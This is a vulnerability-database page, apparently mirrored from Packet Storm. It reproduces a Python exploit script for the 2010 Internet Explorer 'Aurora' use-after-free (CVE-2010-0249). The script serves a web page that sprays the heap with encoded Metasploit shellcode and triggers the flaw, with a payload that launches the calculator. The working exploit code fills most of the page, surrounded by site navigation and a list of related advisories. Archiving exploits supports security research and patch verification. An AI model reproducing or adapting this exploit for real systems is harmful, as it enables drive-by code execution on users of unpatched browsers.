Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Internet Explorer Aurora Exploit

🗓️ 17 Jan 2010 00:00:00Reported by Ahmed ObiedType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 60 Views

This program generates an Internet Explorer exploit targeting CVE-2010-024

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS Internet Explorer Aurora Exploit
17 Jan 201000:00
zdt
canvas		Immunity Canvas: AURORA_FLASH
15 Jan 201017:30
canvas
Circl		CVE-2010-0249
17 Jan 201000:00
circl
CISA KEV Catalog		Microsoft Internet Explorer Use-After-Free Vulnerability
20 May 202600:00
cisa_kev
CISA		 CISA Adds Seven Known Exploited Vulnerabilities to Catalog
20 May 202612:00
cisa
Check Point Advisories		Preemptive Protection against Microsoft Internet Explorer Invalid Pointer Reference Remote Code Execution Vulnerability (MS10-002)
17 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Internet Explorer Invalid Pointer Reference Memory Corruption (CVE-2010-0249)
17 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Trojan: Aurora.Hydraq (CVE-2010-0249)
27 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Microsoft Internet Explorer HTML Object Memory Corruption Vulnerability Use After Free - Ver2 (CVE-2010-0249)
16 Apr 201400:00
checkpoint_advisories
CVE		CVE-2010-0249
15 Jan 201017:00
cve
Rows per page
`#  
# Author : Ahmed Obied ([email protected])  
#  
# This program acts as a web server that generates an exploit to   
# target a vulnerability (CVE-2010-0249) in Internet Explorer.   
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.   
# The exploit's payload spawns the calculator.   
#  
# Usage : python ie_aurora.py [port number]  
#   
  
import sys  
import socket  
  
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler  
  
class RequestHandler(BaseHTTPRequestHandler):  
  
def convert_to_utf16(self, payload):  
enc_payload = ''  
for i in range(0, len(payload), 2):  
num = 0  
for j in range(0, 2):  
num += (ord(payload[i + j]) & 0xff) << (j * 8)  
enc_payload += '%%u%04x' % num  
return enc_payload  
  
def get_payload(self):  
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub  
# http://metasploit.com  
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'  
payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'  
payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'  
payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'  
payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'  
payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'  
payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'  
payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'  
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'  
payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'  
payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'  
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'  
return self.convert_to_utf16(payload)  
  
def get_exploit(self):  
exploit = '''  
<html>  
<head>  
<script>  
  
var obj, event_obj;  
  
function spray_heap()  
{  
var chunk_size, payload, nopsled;  
  
chunk_size = 0x80000;  
payload = unescape("<PAYLOAD>");  
nopsled = unescape("<NOP>");  
while (nopsled.length < chunk_size)  
nopsled += nopsled;  
nopsled_len = chunk_size - (payload.length + 20);   
nopsled = nopsled.substring(0, nopsled_len);  
heap_chunks = new Array();  
for (var i = 0 ; i < 200 ; i++)  
heap_chunks[i] = nopsled + payload;  
}  
  
function initialize()  
{  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ )  
obj[i] = document.createElement("COMMENT");  
}  
  
function ev1(evt)  
{  
event_obj = document.createEventObject(evt);  
document.getElementById("sp1").innerHTML = "";  
window.setInterval(ev2, 1);  
}  
  
function ev2()  
{  
var data, tmp;  
  
data = "";  
tmp = unescape("%u0a0a%u0a0a");  
for (var i = 0 ; i < 4 ; i++)  
data += tmp;  
for (i = 0 ; i < obj.length ; i++ ) {  
obj[i].data = data;  
}  
event_obj.srcElement;  
}  
  
function check()  
{  
if (navigator.userAgent.indexOf("MSIE") == -1)  
return false;  
return true;   
}  
  
if (check()) {  
initialize();  
spray_heap();   
}  
else  
window.location = 'about:blank'  
  
</script>  
</head>  
<body>  
<span id="sp1">  
<img src="aurora.gif" onload="ev1(event)">  
</span>   
</body>  
</html>  
'''  
exploit = exploit.replace('<PAYLOAD>', self.get_payload())  
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')  
return exploit   
  
def get_image(self):  
content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'  
content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'  
content += '\x01\x00\x3b'  
return content  
  
def log_request(self, *args, **kwargs):  
pass  
  
def do_GET(self):  
try:  
if self.path == '/':  
print  
print '[-] Incoming connection from %s' % self.client_address[0]  
self.send_response(200)   
self.send_header('Content-Type', 'text/html')  
self.end_headers()  
print '[-] Sending exploit to %s ...' % self.client_address[0]  
self.wfile.write(self.get_exploit())  
print '[-] Exploit sent to %s' % self.client_address[0]  
elif self.path == '/aurora.gif':   
self.send_response(200)  
self.send_header('Content-Type', 'image/gif')  
self.end_headers()  
self.wfile.write(self.get_image())  
except:   
print '[*] Error : an error has occured while serving the HTTP request'  
print '[-] Exiting ...'  
sys.exit(-1)  
  
  
def main():  
if len(sys.argv) != 2:  
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]  
sys.exit(0)  
try:  
port = int(sys.argv[1])  
if port < 1024 or port > 65535:  
raise ValueError  
try:  
serv = HTTPServer(('', port), RequestHandler)  
ip = socket.gethostbyname(socket.gethostname())  
print '[-] Web server is running at http://%s:%d/' % (ip, port)  
try:  
serv.serve_forever()  
except:  
print '[-] Exiting ...'   
except socket.error:  
print '[*] Error : a socket error has occurred'  
sys.exit(-1)   
except ValueError:  
print '[*] Error : an invalid port number was given'  
sys.exit(-1)  
  
if __name__ == '__main__':  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jan 2010 00:00Current
EPSS0.88788
internet explorercve-2010-0249exploitvulnerabilitywindows xpweb serverpayloadcalculatorpythonbasehttpserverhttpserver
60